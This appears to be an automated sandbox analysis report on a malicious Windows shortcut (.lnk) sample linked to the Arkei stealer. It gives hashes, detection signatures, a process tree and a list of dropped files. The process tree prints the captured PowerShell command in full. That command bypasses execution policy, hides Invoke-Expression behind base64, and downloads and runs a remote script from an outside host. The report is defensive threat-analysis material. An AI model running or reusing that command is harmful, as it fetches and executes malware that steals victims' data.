Analysis
-
max time kernel
0s -
max time network
11s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
23-05-2022 17:42
Static task
static1
Behavioral task
behavioral1
Sample
01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk
Resource
win7-20220414-en
General
-
Target
01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk
-
Size
840KB
-
MD5
adedd222b98f6677ac30ccc81c38954b
-
SHA1
1477164ec83772104e90ddda0f882283a002990f
-
SHA256
01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6
-
SHA512
085aeadd6d15025ec4e508cbcdfeb5c10b7c524510d8a4760a6d7214e57e71c8272b1071ca286f50a1dbe1abd39bf6c801365be5f6660133ccf9a9d091e98663
Malware Config
Extracted
http://timebound.ug/pps.ps1
Extracted
arkei
Default
Signatures
-
suricata: ET MALWARE Windows executable base64 encoded
suricata: ET MALWARE Windows executable base64 encoded
-
Uses the VBS compiler for execution 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1952 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1160 wrote to memory of 1952 1160 cmd.exe 21 PID 1160 wrote to memory of 1952 1160 cmd.exe 21 PID 1160 wrote to memory of 1952 1160 cmd.exe 21
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://timebound.ug/pps.ps1');t $nXR2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵PID:852
-
-
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"1⤵PID:868
-
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 02⤵PID:1404
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵PID:1888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe"C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe" 02⤵PID:1312
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe"C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe" 02⤵PID:2028
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe" 02⤵PID:1564
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵PID:976
-
C:\Users\Admin\AppData\Roaming\azne.exe"C:\Users\Admin\AppData\Roaming\azne.exe"4⤵PID:604
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD50962c3cad64494d5e9e9e4016bbed4c7
SHA10547c7e945aa63a507013afee92e6ce22e3e38a8
SHA256bb3336bb6c2f7c9c3ebac9f0312421c37d8ec4cc3ee5682d383f411d7646f0bb
SHA512d5885c708e46ec125b0e455ffe852f57cc11526e1275c75655e2b0e0e793fe839f41bc00ebd21f71a8e49838c46133289cf46a174636904ab5023d2ee72d25c9
-
Filesize
114KB
MD556e431e51ca3bf588df8971393f53f42
SHA1abc4437814ea22c72db84b7c759461a712cc2115
SHA2561ed83bb1fabb99e76e44184a6a0af292bd6724cb59e2a61f242e395a69a9dd8d
SHA51283487e8e910f4f3cd6e1323c1ef9c374e33880084a5351c25185ba78563d56543bf69745fafab59f94bcc68b917a046e7e617b741653e6727a4b34d08abd4b70
-
Filesize
92KB
MD51e3e40d3b20bf9b1b657d07735b574e4
SHA12cd78bab729f2911ee04edbd02d1082b630ccc53
SHA2565a4d4494ddc98651c9667137c5bdcd2d68f0d10e60c92260908295d3cae25645
SHA5126f60e405f73b80d1d62ab58b61dd44ce79cb28629602712d272fa09b85ed93a34c055c38f49cef3c588985402edbf45cf9517987723ac52d83bd63b83a993580
-
Filesize
83KB
MD529d7feca2c04d2ff4b4668a1f816b404
SHA131f1d36a3678e469fb96ec3a151e737f07e65f4e
SHA2565082ce2d52703bed5f402136808daa1ae2816cbed22ff6b2fdba78f9b9462a41
SHA512652edc4ae9a8ad87df6938f2755a9f32a8601d72968ed462ee7e90d4508c9911bfa173655345576b6a3d8e81c4b6f204950e81c57934bc08075ac31727ec4ab8
-
Filesize
161KB
MD5f8799ff6b0663f1e3c8da9d436d5020d
SHA136807afd2094b6d00d2975c0e118988e97c316db
SHA25631401ddc4ba6bb6014d80a796fd4e30d0d3a83207457bd37921d77e33e1d407f
SHA512593f3663aaed8dfba304741f7a031427b33d8105192e11edd7dbde9a5d338c6841838f673fe06827c5c8498512d33fca826b4f0181bf45db8b2ad40eb29af644
-
Filesize
70KB
MD555c486a6ff59544def7055a73d083565
SHA1103a7b2e5dab8d2534063021c0e3a9502661b1d5
SHA2563a86771292f6e5c430e1e7927608e962071cc23cfc068eea0802a8ca82bee080
SHA512b7d7e7b1ba4b9fd652a22ca9a5d40c1df0c6ed9133e12104ee69f0ff0cf5e58948547b57bdd0fe7431882c756b0288c71edde4e9942975b06710ff413929f7be
-
Filesize
71KB
MD5977905b4daf9f9f8e29ce18c8ce9b935
SHA17c2d746c665626b3e960d7ecbeeafcd001607d8b
SHA25637220526e89a77343c68aef1fa5de82586387073ba876455bf2a5fadfe51c4fb
SHA5128dd764f0393bfe0550cac6884363b3a592501da8e3ce01f1a1668dcd87e9ba21a4ad38fdb47a77dd30a158a46ec048672590760c8cc04ac5b832e6984217c374
-
Filesize
16KB
MD52ce9dfb92a69f665d1fb86cb60b388ae
SHA1e18c53a13f9795ab83f6625a14e983e7b6e5e441
SHA256f8f08f5dfef8dba2cdb0daf49ca0211e71d303fcf1e73c2f9150d3af7d2c08de
SHA51276b28b8908600e6c7e5d619f656febc1be1c381b574477c2c330cfe9e60c9379a3cb219c0a4ce3d5099179812e051e07a8856fa0c44310ea4905a853673fecfa
-
Filesize
51KB
MD5fac25ce58e4589e49cf291023dba62f7
SHA150eff0075a360238582f5900571e7a8c691fe28c
SHA256463b2aa00076afbd6316e49b8e0e357705385b906f6f8b804bd69291e5b1c9a1
SHA512b6ef73c5a6822f94b09d596044448137e98d88e2061a31f7fb1c2578a0f86456c83d37a7d00673ff30b19f66dbf516497ab92c1d0a45c4457a9d4d1083d50535
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
12KB
MD536d728c65011fb73cb223d35435c4874
SHA16a97affba6100678b7c26221efc1e79b775cbe9f
SHA2568f4ef8298c4011716965d4fe3b8ff13ae6493281471100f928fd0607baa3cd6e
SHA5120a01758c260c35749c1a323cfd79f8d8f5405e9df444db18106b00ac59cc838db99453f7cfa3dd6d0f425534d7a476fdad7cfb3e8159516415aedb6f5e49ab72
-
Filesize
12KB
MD536d728c65011fb73cb223d35435c4874
SHA16a97affba6100678b7c26221efc1e79b775cbe9f
SHA2568f4ef8298c4011716965d4fe3b8ff13ae6493281471100f928fd0607baa3cd6e
SHA5120a01758c260c35749c1a323cfd79f8d8f5405e9df444db18106b00ac59cc838db99453f7cfa3dd6d0f425534d7a476fdad7cfb3e8159516415aedb6f5e49ab72
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
90KB
MD5a01c4163d696fa164066e3df0e6bc0c2
SHA1e5b836d3893d879ef00c545356e8e16d5a7fb08b
SHA256fc5f7b37b936904b8c853ac13d980b12de54b14277d0a2314ece49719d9247b2
SHA512f63b4bc01cf02ebcc12828eb12a4a19d4e052187d3fd6fe3c684767c8bdd0c3f33a2d5f7731efe950d94442213dca6f92a6dba07f6ea0409c8d6f67dcf43431e
-
Filesize
170KB
MD56f9310aa909cf559503458740c7d8a36
SHA1c79a52aca29cff37717c808c54f88e1d53038545
SHA256e5ebec93055776f2d7302e5b10a0130369c0ec7860e00aba9100dcae9be148e3
SHA5124971521df0f1588290b44fdfa002538e679db0ad7f4bd5fbb886658ab09fa24333619074b18f7a3aca30805ca69baac0b29f204ca5ddf1f0d31641c8b7d661b7
-
Filesize
171KB
MD5bfe362d89f6acfd60b6b8393b3ee3889
SHA164bd144602399e368bc607d806fb4753953664ce
SHA2568733597faeb71ee515a1e4c46fcf66e3911957848da0cfbe6c47a20d478a3f25
SHA5125f38aa5981a850cdde381d274c05310221cb8a176af038d98756675d42340eb222910c4492937836e101d7c3bdbd523c077ecf1cfe47e292298dd0fb12651a40
-
Filesize
184KB
MD5db55816e8b2237bc32947e5e06725726
SHA1085ebf5d5450cf7d1fbd3af810291c9b36439572
SHA2566c2b85ec31e7ce36389d7ed9734c65b9ad6810208b75daddaf4e123ff5d773cc
SHA51229e1458c9e6c360b6a74cad6632df6389cd8cb127f8c20161a3ac15778c7f27dbdbaddfb30ccc24d1ca6f3d3555bdf3334dd28dec88d6371c7857b7e8a96c796
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
103KB
MD56ffa8814351f4dff975560a260820c79
SHA15054a878589da233dc57c9bef37ab13f0afdbd68
SHA2563a1fcbffa770b3bca4cd7c3ba74d5d0f61baa02d8aeebbf374cd3d0e0b4771ed
SHA5129d6a21a5ca5df74acaad470cf63b1be5f9abc7ce00e42c3354084cbd2f1d02a51c9b12b751acb9bda261fbd7a1eb64d3bbad03cb234fec03caabdf1fefed3724
-
Filesize
93KB
MD53a6a0145105b12c798585a474f08dbad
SHA14eacddccc1f910cfa93df17cae847444cbec398d
SHA2568d84a7f1ff13b79b81789563a3eb1551bf069054a9a07fe2112b45b39ffcf6f6
SHA5121bf6015363068432eb2665fcd537bbb4372b99aa4cce8ced5a90e42fca5339c74a615295b909dade82ee04fb612719df724634318d027ab6b918c72512957643
-
Filesize
102KB
MD587e6b4ebdd70808da6cce0734abe85ce
SHA1b91c953b746b52d2f85323a86bdb2f3837ae1225
SHA256784f7879e16816ee812507ae08358a044401ddc0fb87269a07f60d350c084e91
SHA5123b480676368e597c98d026904982dcf7914e0812e7b5841ab32624a9e9a6cf4e5c2daf710911b89895b13bc65bd2840b6cfc191a0422361284ce2faa9ca4b072
-
Filesize
101KB
MD5378b8aed778e63fb9c0dc96ad9d128d9
SHA1ac76e7e5ba2e2d841634bdd115e9b3506f55f645
SHA256cbd29d9301a2898d76cb953a86a59b6696dcd5cc7a4cce28032864074e04d6f2
SHA512eadf677cb26b6e354bfecbc8f257b2e3b31a5e5dd40d692fed0555767ad157a5bbf246b0be776e676ba51a8c4b8313f937de1649f1d18fc38ffc32698bbea8d1
-
Filesize
113KB
MD5e621bee9b109ed822cf513cfa0da99c2
SHA123e90c320b173b22240fd20f3afd52f2844ecb25
SHA25627b7ca14c8127fd9fafd3c439fdb50335ad637ec4637b7a748d1a6c889aa027b
SHA5122f6c338cfa357ecebb69beb61b65116dd134bc9c421ca80e54bd336b17b6f96baab1c12f0605e1b2cc430ef5c530a1a2488377704c241f95435b622d26e08095
-
Filesize
131KB
MD5bfd22afd14461fbf5982f7f7f9587a57
SHA1840e125b488e47aeb119a5fc4cf2d261b2b0e1c6
SHA2563ca9cef77e0ca18a5616ec51002661c75ea8c44ca7c23070e355f80901d0d3f1
SHA512621ee8bffe908be787f726b98067be4bc6dddb82f460c26756b8e7776aeb6e5059234ad378dee12a6f8dbe252873ca87d601e3f20d2dd97a5ce60a366468ee8f
-
Filesize
142KB
MD52269d42d51befe5751f3d18f9125c1b4
SHA16080e4cd589325641cf3d4050945ca4c6cc203dd
SHA256bab0b3ef6ab44bf900ec0450bffbc3c89f23bf8ad37b6d642f7f1fb7ad6c6a10
SHA512c054edf849a2152907bc4b8d67c4a0a6c6654c95c000c717d4eef0717e81e76d71cad6deb4324ab4494addf19d7140c06ee424d52b283d24f16d4ce81fc7d216
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
100KB
MD5c7a310982da68b10360854f9cd78e718
SHA160140c28e0b7db797a771c2dee081fa3812246db
SHA256df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
SHA5126747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
-
Filesize
92KB
MD5f8f8b9aecb67343d99b3342dc9818cdd
SHA179c07399d6edf57cba24e19422b4e1796940afdc
SHA256307677ca052275fbbc8b8cdbebe02fe9322ace0429482524ab741d1d80c98e3c
SHA51290993e2f351f492343a28dcff1a9a7b19357780fe4750225f6e1b698399f2e827c368b5e6a41da1642205295dbbaff548f079b5a050de6021393fe79e461e05c
-
Filesize
93KB
MD5fcf8d1a8b5897a9ad93f8af351c1b799
SHA13f38b6fc691d4f2d39df31b13158bac42a9b2be3
SHA2566e9d78b30b8deb947518dd73759d86868f5abcad9bfff0fd4eced5b8844fdf19
SHA51233ab6a227819f22b17f3829cc45cb78233fde97f8a3f15d5b48a22d0639c623dc75874c044ae675a81d54e3e322434737435dba4a968896c65d92d156151ee82
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
72KB
MD5789893495d65d3be3e0052e513e0419a
SHA1d4c999ade02b85f78ad5fc99d055cf8e0ce84e50
SHA2567c20981a9279b9c7483098181bfdfdc0816607b0e54369d732fe3e4b93823cdd
SHA512075346c0eb712566f68354312e1f42d33fc252cecf544b4c1f378f79382605bf6a59ea2bc16c9179b996d42057aeb0b482b78e51bd78fa751c020c004332d1e7